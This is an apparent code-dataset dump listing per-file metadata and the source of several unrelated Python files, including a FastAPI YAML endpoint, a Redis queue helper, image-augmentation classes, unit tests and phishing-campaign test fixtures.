hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
df8424f222409c2cd454068f3ca5a2c343650c81
| 2,113 |
py
|
Python
|
_scripts/make_committees_data.py
|
GCCR/GCCR.github.io
|
9400e64ee1eb618bfaeaf7a1c927a04165db191b
|
[
"MIT"
] | 5 |
2020-03-27T20:01:18.000Z
|
2021-06-06T12:41:20.000Z
|
_scripts/make_committees_data.py
|
GCCR/GCCR.github.io
|
9400e64ee1eb618bfaeaf7a1c927a04165db191b
|
[
"MIT"
] | 39 |
2020-04-01T23:55:10.000Z
|
2022-02-26T07:09:57.000Z
|
_scripts/make_committees_data.py
|
GCCR/GCCR.github.io
|
9400e64ee1eb618bfaeaf7a1c927a04165db191b
|
[
"MIT"
] | 3 |
2020-03-29T16:06:02.000Z
|
2020-04-07T19:23:37.000Z
|
import os
import re
import logging
import pandas as pd
from googleapiclient.discovery import build
import yaml
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
# load personal websites
with open("_data/websites.yml", "r") as f:
WEBSITES = yaml.load(f, Loader=yaml.BaseLoader)
def member_url(member):
name, *rest = member.split(" (")
name = "".join(name)
try:
url = WEBSITES[name]
except KeyError:
return member
rest = f' ({"".join(rest)}' if rest else ""
return f'<a href="{url}">{name}</a>{rest}'
# fetch Google Sheet for members data
GOOGLE_API_KEY = os.environ["GOOGLE_API_KEY"]
COMMITTEES_SPREADSHEET_ID = os.environ["COMMITTEES_SPREADSHEET_ID"]
service = build("sheets", "v4", developerKey=GOOGLE_API_KEY)
sheet = service.spreadsheets()
result = sheet.values().get(spreadsheetId=COMMITTEES_SPREADSHEET_ID,
range='Sheet1').execute()
values = result.get('values', [])
# to dataframe
columns = []
for col in values[0]:
*name, time = col.split()
columns.append((" ".join(name), time.capitalize()))
n_cols = len(columns)
columns = pd.MultiIndex.from_tuples(columns, names=["Committee", "Time"])
data = []
for row in values[1:]:
n = len(row)
row = [x if x else None for x in row]
padded = row + [None for _ in range(n_cols - n)]
data.append(padded)
df = pd.DataFrame(data, columns=columns)
# write yaml
content = {}
for committee in df.columns[1:].droplevel(1).drop_duplicates():
content[committee] = {}
for time in df[committee].columns:
col = (committee, time)
members = df[col].dropna().to_list()
if members:
content[committee][time] = [member_url(m) for m in members]
if not content[committee]:
content.pop(committee)
with open("_data/committees.yml", "w") as f:
for committee, items in content.items():
f.write(f"- committee: {committee}\n")
f.write(f" listing:\n")
for time, members in items.items():
f.write(f" - time: {time}\n")
f.write(f" members: {members}\n")
| 32.015152 | 76 | 0.648367 |
10f1f7311325ff8b922534481812f358ca7b3651
| 235 |
py
|
Python
|
PMIa/2015/ANDROS_D_A/task_5_2.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/ANDROS_D_A/task_5_2.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/ANDROS_D_A/task_5_2.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 5.Вариант 2.
# Напишите программу, которая бы при запуске случайным образом отображала имя одного из трех поросят.
# Andros D.A.
# 14.04.2016
import random
pigs=["Naf-Naf","Nuf-Nuf","Nif-Nif"]
p=random.choice(pigs)
print(p)
| 23.5 | 101 | 0.731915 |
d51752bb875ccca282f100672e2eed6891f048dd
| 789 |
py
|
Python
|
docs_src/path_operation_advanced_configuration/tutorial007.py
|
jomue/fastapi
|
bee35f5ae1fc58e7ab125427ad4287210e99d8b3
|
[
"MIT"
] | 53,007 |
2018-12-08T10:05:29.000Z
|
2022-03-31T23:30:02.000Z
|
docs_src/path_operation_advanced_configuration/tutorial007.py
|
jomue/fastapi
|
bee35f5ae1fc58e7ab125427ad4287210e99d8b3
|
[
"MIT"
] | 4,155 |
2019-01-05T05:07:49.000Z
|
2022-03-31T21:25:38.000Z
|
docs_src/path_operation_advanced_configuration/tutorial007.py
|
jomue/fastapi
|
bee35f5ae1fc58e7ab125427ad4287210e99d8b3
|
[
"MIT"
] | 4,092 |
2018-12-09T16:21:00.000Z
|
2022-03-31T07:59:45.000Z
|
from typing import List
import yaml
from fastapi import FastAPI, HTTPException, Request
from pydantic import BaseModel, ValidationError
app = FastAPI()
class Item(BaseModel):
name: str
tags: List[str]
@app.post(
"/items/",
openapi_extra={
"requestBody": {
"content": {"application/x-yaml": {"schema": Item.schema()}},
"required": True,
},
},
)
async def create_item(request: Request):
raw_body = await request.body()
try:
data = yaml.safe_load(raw_body)
except yaml.YAMLError:
raise HTTPException(status_code=422, detail="Invalid YAML")
try:
item = Item.parse_obj(data)
except ValidationError as e:
raise HTTPException(status_code=422, detail=e.errors())
return item
| 22.542857 | 73 | 0.640051 |
7f57f6c832b3711e423cec6abd7c42e0c01e4580
| 1,381 |
py
|
Python
|
api/db/redis_mq.py
|
Latent-Lxx/dazhou-dw
|
902b4b625cda4c9e4eb205017b8955b81f37a0b5
|
[
"MIT"
] | null | null | null |
api/db/redis_mq.py
|
Latent-Lxx/dazhou-dw
|
902b4b625cda4c9e4eb205017b8955b81f37a0b5
|
[
"MIT"
] | null | null | null |
api/db/redis_mq.py
|
Latent-Lxx/dazhou-dw
|
902b4b625cda4c9e4eb205017b8955b81f37a0b5
|
[
"MIT"
] | 1 |
2022-02-11T04:44:37.000Z
|
2022-02-11T04:44:37.000Z
|
# !/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2021/7/1 下午4:19
# @Author : Latent
# @Email : [email protected]
# @File : kafka.py
# @Software: PyCharm
# @class : 用于redis 的消息队列 -->生产消费者
import redis
class RedisMQ(object):
def __init__(self):
self.redis_mq = redis.Redis(host='127.0.0.1', port='6379', db=1, decode_responses=True, charset='UTF-8',
encoding='UTF-8',health_check_interval=30)
# ==> 1. Producer
def redis_push(self, name: str, push_msg: dict):
try:
self.redis_mq.lpush(name, str(push_msg))
return 'ok'
except Exception as e:
print('==> redis入队列出现问题:', e)
return None
# ==> 2.Consumer
def redis_pop(self, name: str):
try:
pop_value = self.redis_mq.rpop(name)
return pop_value
except Exception as e:
print('==> redis出队出现问题', e)
return None
# ==> 3.查询队列的长度
def redis_len(self, name:str):
count = self.redis_mq.llen(name)
return count
# ==> 4.获取所有的key
def redis_getkey(self):
keys = self.redis_mq.scan_iter()
return list(keys)
# ==> 5.清空队列
def redis_delete(self, redis_key):
self.redis_mq.delete(redis_key)
return 'ok'
# ==> 6.url 去重集合
def redis_set(self, msg):
pass
| 23.016667 | 112 | 0.553222 |
1005d30b155932917243afde01f34bbe03c128da
| 4,098 |
py
|
Python
|
rbac/common/user/update_user.py
|
fthornton67/sawtooth-next-directory
|
79479afb8d234911c56379bb1d8abf11f28ef86d
|
[
"Apache-2.0"
] | 75 |
2018-04-06T09:13:34.000Z
|
2020-05-18T18:59:47.000Z
|
rbac/common/user/update_user.py
|
fthornton67/sawtooth-next-directory
|
79479afb8d234911c56379bb1d8abf11f28ef86d
|
[
"Apache-2.0"
] | 989 |
2018-04-18T21:01:56.000Z
|
2019-10-23T15:37:09.000Z
|
rbac/common/user/update_user.py
|
fthornton67/sawtooth-next-directory
|
79479afb8d234911c56379bb1d8abf11f28ef86d
|
[
"Apache-2.0"
] | 72 |
2018-04-13T18:29:12.000Z
|
2020-05-29T06:00:33.000Z
|
# Copyright 2019 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
""" Implements the UPDATE_USER message
usage: rbac.user.update()
"""
from rbac.common import addresser
from rbac.common.addresser.address_space import (
AddressSpace,
ObjectType,
RelationshipType,
)
from rbac.common.base.base_message import BaseMessage
from rbac.common.logs import get_default_logger
LOGGER = get_default_logger(__name__)
class UpdateUser(BaseMessage):
""" Implements the UPDATE_USER message
usage: rbac.user.update()
"""
def __init__(self):
super().__init__()
self._register()
@property
def message_action_type(self):
"""The action type from AddressSpace performed by this message"""
return addresser.MessageActionType.UPDATE
@property
def address_type(self):
"""The address type from AddressSpace implemented by this class"""
return AddressSpace.USER_ATTRIBUTES
@property
def object_type(self):
"""The object type from AddressSpace implemented by this class"""
return ObjectType.USER
@property
def related_type(self):
"""The related type from AddressSpace implemented by this class"""
return ObjectType.NONE
@property
def relationship_type(self):
"""The relationship type from AddressSpace implemented by this class"""
return RelationshipType.ATTRIBUTES
def make_addresses(self, message, signer_user_id):
"""Makes the appropriate inputs & output addresses for the message type"""
inputs, _ = super().make_addresses(message, signer_user_id)
user_address = self.address(object_id=message.next_id)
inputs.add(user_address)
if message.manager_id:
manager_address = self.address(object_id=message.manager_id)
inputs.add(manager_address)
outputs = inputs
return inputs, outputs
@property
def allow_signer_not_in_state(self):
"""Whether the signer of the message is allowed to not be
in state. Used only for when the transaction also creates the
signer of the message (e.g. CREATE_USER)"""
return False
def validate(self, message, signer=None):
"""Validates the message values"""
super().validate(message=message, signer=signer)
if len(message.name) < 5:
raise ValueError("Users must have names longer than 4 characters")
if message.manager_id is not None:
if message.next_id == message.manager_id:
raise ValueError("User cannot be their own manager")
def validate_state(self, context, message, payload, input_state, store):
"""Validates the message against state"""
super().validate_state(
context=context,
message=message,
payload=payload,
input_state=input_state,
store=store,
)
if not addresser.user.exists_in_state_inputs(
inputs=payload.inputs, input_state=input_state, object_id=message.next_id
):
raise ValueError("User with id {} does not exist".format(message.next_id))
if message.manager_id and not addresser.user.exists_in_state_inputs(
inputs=payload.inputs, input_state=input_state, object_id=message.manager_id
):
raise ValueError(
"Manager with id {} does not exist in state".format(message.manager_id)
)
| 35.947368 | 88 | 0.667887 |
63f527bd2724ad07a375271eb260d585a44d04a7
| 274 |
py
|
Python
|
src/onegov/org/views/person_move.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/views/person_move.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/views/person_move.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.security import Private
from onegov.org import OrgApp
from onegov.org.models import PersonMove
@OrgApp.view(model=PersonMove, permission=Private, request_method='PUT')
def move_page(self, request):
request.assert_valid_csrf_token()
self.execute()
| 27.4 | 72 | 0.79562 |
122aa105608851f3a59daba6ab2867902a33dc5f
| 522 |
py
|
Python
|
python/unittest/test_invalid_input.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/unittest/test_invalid_input.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/unittest/test_invalid_input.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
import unittest
class TestInvalidInput(unittest.TestCase):
# using a with block is the best way to assert errors
def test_string_function_failure(self):
with self.assertRaises(AttributeError):
x = None.lower()
# you can specify regex to handle the specific error message
def test_string_function_failure_with_regex(self):
with self.assertRaisesRegex(
AttributeError,
"'NoneType' object has no attribute 'lower'"):
x = None.lower()
| 32.625 | 64 | 0.666667 |
d6206fd0e0680db8bae941c703e12c1c897b855d
| 636 |
py
|
Python
|
scripts/open_cv/open_cv_sw02_get_pixel_values.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
scripts/open_cv/open_cv_sw02_get_pixel_values.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
scripts/open_cv/open_cv_sw02_get_pixel_values.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# ################################################################################
# edited WHS, OJ , 7.1.2022 #
import cv2
print(cv2.__version__)
# lese Bild von Festplatte
image = cv2.imread('/home/oj/catkin_ws/src/rtc/scripts/open_cv/test.png')
# lese Farbwerte an Position y, x
y = 100
x = 50
(b, g, r) = image[y, x]
# gib Farbwerte auf Bildschirm aus
print(b, g, r)
# Zeichne rote Linie (im BGR-Farbraum)
for x in range(1, 100):
image[y, x] = (0, 0, 255)
# zeige Bild in Fenster an
cv2.imshow("Bild", image)
# warte auf Tastendruck (wichtig, sonst sieht man das Fenster nicht)
cv2.waitKey(0)
| 21.931034 | 82 | 0.589623 |
d651de92c847d2506ab9d8514a8400ce98355ac1
| 822 |
py
|
Python
|
tests/test_buendelvertrag.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
tests/test_buendelvertrag.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
tests/test_buendelvertrag.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
import pytest # type:ignore[import]
from bo4e.bo.buendelvertrag import Buendelvertrag, BuendelvertragSchema
from tests.serialization_helper import assert_serialization_roundtrip # type:ignore[import]
from tests.test_vertrag import TestVertrag # type:ignore[import]
class TestBuendelvertrag:
@pytest.mark.parametrize(
"buendelvertrag",
[
pytest.param(Buendelvertrag(einzelvertraege=[TestVertrag().get_example_vertrag()])),
],
)
def test_serialization_roundtrip(self, buendelvertrag: Buendelvertrag):
assert_serialization_roundtrip(buendelvertrag, BuendelvertragSchema())
def test_missing_required_attribute(self):
with pytest.raises(TypeError) as excinfo:
_ = Buendelvertrag()
assert "missing 1 required" in str(excinfo.value)
| 35.73913 | 96 | 0.739659 |
c3d851a1dcc8577412b9a527562c32560864696c
| 4,776 |
py
|
Python
|
official/cv/ADNet/src/utils/augmentations.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/ADNet/src/utils/augmentations.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/ADNet/src/utils/augmentations.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# matlab code:
# https://github.com/hellbell/ADNet/blob/3a7955587b5d395401ebc94a5ab067759340680d/utils/get_extract_regions.m
# other reference: https://github.com/amdegroot/ssd.pytorch/blob/master/utils/augmentations.py
import numpy as np
import cv2
class ToTensor:
def __call__(self, cvimage, box=None, action_label=None, conf_label=None):
return cvimage.astype(np.float32), box, action_label, conf_label
class SubtractMeans:
def __init__(self, mean):
self.mean = np.array(mean, dtype=np.float32)
def __call__(self, image, box=None, action_label=None, conf_label=None):
image = image.astype(np.float32)
image -= self.mean
return image.astype(np.float32), box, action_label, conf_label
class CropRegion:
def __call__(self, image, box, action_label=None, conf_label=None):
image = np.array(image)
box = np.array(box)
if box is not None:
center = box[0:2] + 0.5 * box[2:4]
wh = box[2:4] * 1.4 # multiplication = 1.4
box_lefttop = center - 0.5 * wh
box_rightbottom = center + 0.5 * wh
box_ = [
max(0, box_lefttop[0]),
max(0, box_lefttop[1]),
min(box_rightbottom[0], image.shape[1]),
min(box_rightbottom[1], image.shape[0])
]
im = image[int(box_[1]):int(box_[3]), int(box_[0]):int(box_[2]), :]
else:
im = image[:, :, :]
return im.astype(np.float32), box, action_label, conf_label
# crop "multiplication" times of the box width and height
class CropRegion_withContext:
def __init__(self, multiplication=None):
if multiplication is None:
multiplication = 1.4 # same with default CropRegion
assert multiplication >= 1, "multiplication should more than 1 so the object itself is not cropped"
self.multiplication = multiplication
def __call__(self, image, box, action_label=None, conf_label=None):
image = np.array(image)
box = np.array(box)
if box is not None:
center = box[0:2] + 0.5 * box[2:4]
wh = box[2:4] * self.multiplication
box_lefttop = center - 0.5 * wh
box_rightbottom = center + 0.5 * wh
box_ = [
max(0, box_lefttop[0]),
max(0, box_lefttop[1]),
min(box_rightbottom[0], image.shape[1]),
min(box_rightbottom[1], image.shape[0])
]
im = image[int(box_[1]):int(box_[3]), int(box_[0]):int(box_[2]), :]
else:
im = image[:, :, :]
return im.astype(np.float32), box, action_label, conf_label
class ResizeImage:
def __init__(self, inputSize):
self.inputSize = inputSize # network's input size (which is the output size of this function)
def __call__(self, image, box, action_label=None, conf_label=None):
im = cv2.resize(image, dsize=tuple(self.inputSize[:2]))
return im.astype(np.float32), box, action_label, conf_label
class Compose():
"""Composes several augmentations together.
Args:
transforms (List[Transform]): list of transforms to compose.
Example:
# >>> augmentations.Compose([
# >>> transforms.CenterCrop(10),
# >>> transforms.ToTensor(),
# >>> ])
"""
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, img, box=None, action_label=None, conf_label=None):
for t in self.transforms:
img, box, action_label, conf_label = t(img, box, action_label, conf_label)
return img, box, action_label, conf_label
class ADNet_Augmentation:
def __init__(self, opts):
self.augment = Compose([
SubtractMeans(opts['means']),
CropRegion(),
ResizeImage(opts['inputSize']),
# not convert to Tensor,just
ToTensor()
])
def __call__(self, img, box, action_label=None, conf_label=None):
return self.augment(img, box, action_label, conf_label)
| 36.181818 | 109 | 0.613903 |
614e00aae487cf3d744eee81d1a5bc45e1919e33
| 2,526 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_facts.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_facts.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_facts.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..onyx_module import TestOnyxModule, load_fixture
from ansible_collections.community.general.plugins.modules.network.onyx import onyx_facts
class TestOnyxFacts(TestOnyxModule):
module = onyx_facts
def setUp(self):
super(TestOnyxFacts, self).setUp()
self.mock_run_command = patch.object(
onyx_facts.FactsBase, "_show_cmd")
self.run_command = self.mock_run_command.start()
def tearDown(self):
super(TestOnyxFacts, self).tearDown()
self.mock_run_command.stop()
def load_fixtures(self, commands=None, transport=None):
def load_from_file(*args, **kwargs):
command = args[0]
filename = "onyx_facts_%s.cfg" % command
filename = filename.replace(' ', '_')
filename = filename.replace('/', '7')
output = load_fixture(filename)
return output
self.run_command.side_effect = load_from_file
def test_onyx_facts_version(self):
set_module_args(dict(gather_subset='version'))
result = self.execute_module()
facts = result.get('ansible_facts')
self.assertEqual(len(facts), 2)
version = facts['ansible_net_version']
self.assertEqual(version['Product name'], 'MLNX-OS')
def test_onyx_facts_modules(self):
set_module_args(dict(gather_subset='modules'))
result = self.execute_module()
facts = result.get('ansible_facts')
self.assertEqual(len(facts), 2)
modules = facts['ansible_net_modules']
self.assertIn("MGMT", modules)
def test_onyx_facts_interfaces(self):
set_module_args(dict(gather_subset='interfaces'))
result = self.execute_module()
facts = result.get('ansible_facts')
self.assertEqual(len(facts), 2)
interfaces = facts['ansible_net_interfaces']
self.assertEqual(len(interfaces), 2)
def test_onyx_facts_all(self):
set_module_args(dict(gather_subset='all'))
result = self.execute_module()
facts = result.get('ansible_facts')
self.assertEqual(len(facts), 4)
| 35.083333 | 92 | 0.682898 |
619dfdc9cb9592291fd419e39bf5a2162c03dc62
| 457 |
py
|
Python
|
Packs/CommonScripts/Scripts/IsListExist/IsListExist.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CommonScripts/Scripts/IsListExist/IsListExist.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CommonScripts/Scripts/IsListExist/IsListExist.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
def main():
list_name = demisto.args()['listName']
res = demisto.executeCommand("getList", {"listName": list_name})
res = res[0]
if res['Type'] == entryTypes['error'] and "Item not found" in res['Contents']:
demisto.results('no')
else:
demisto.results('yes')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 26.882353 | 82 | 0.63895 |
9c8c791e6d197a6296f7914ad78462a1e5f0326b
| 10,145 |
py
|
Python
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Campaign/Scripts/SetPhishingCampaignDetails/test_data/campaign_data.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
CAMPAIGN_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.9999999999999999,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 1,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 3,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "5",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:01:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.99,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.98,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 0.85,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 4,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
NEW_INCIDENT_2_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "4",
"name": "Verify your example account 798",
"occurred": "2021-11-21T16:00:00.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.98,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 0.97,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "3",
"name": "Verify your example account 798",
"occurred": "2021-11-21T15:00:07.425185504Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 3,
"similarity": 0.86,
"status": 1
}
],
"indicators": [
{
"id": "1263",
"value": "http://www.example.com"
}
],
"involvedIncidentsCount": 4,
"isCampaignFound": True
},
"ExistingCampaignID": [
"809"
]
}
OLD_INCIDENT_CONTEXT = {
"EmailCampaign": {
"firstIncidentDate": "2021-11-21T14:00:07.425185+00:00",
"incidents": [
{
"emailfrom": "[email protected]",
"emailfromdomain": "example.com",
"id": "1",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:00:07.119800133Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
"severity": 0,
"similarity": 1,
"status": 1
},
{
"emailfrom": "[email protected]",
"emailfromdomain": "example2.com",
"id": "2",
"name": "Verify your example account 798",
"occurred": "2021-11-21T14:59:01.690685509Z",
"recipients": [
"[email protected]"
],
"recipientsdomain": [
"onmicrosoft.com"
],
